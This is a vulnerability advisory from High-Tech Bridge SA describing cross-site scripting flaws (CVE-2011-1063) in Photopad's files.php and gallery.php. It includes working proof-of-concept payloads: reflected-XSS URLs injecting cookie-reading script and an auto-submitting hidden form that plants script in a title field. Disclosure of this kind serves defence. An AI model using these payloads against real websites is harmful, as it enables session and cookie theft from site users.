Cross-site Scripting (XSS) Vulnerabilities in Photopad

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Photopad which could be exploited to perform cross-site scripting attacks.

1. Cross-site scripting (XSS) vulnerabilities in Photopad: CVE-2011-1063
   1.1 The vulnerability exists due to input sanitation errors in the “id” and “data[title]” parameter in files.php and gallery.php scripts. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
   Exploitation examples:

http://host/files.php?action=edit&amp;id=999"><script>alert(document.cookie)</sc ript>
2.
http://host/gallery.php?action=view&amp;id=999"><script>alert(document.cookie)</ script>
3.
<form action=“http://host/files.php?action=edit&amp;id=2” method=“post” name=“main”>
<input type=“hidden” name=“data[title]” value=‘title"><script>alert(document.cookie)</script>’>
<input type=“hidden” name=“data[tags]” value=‘tag’>
</form>
<script>
document.main.submit();
</script>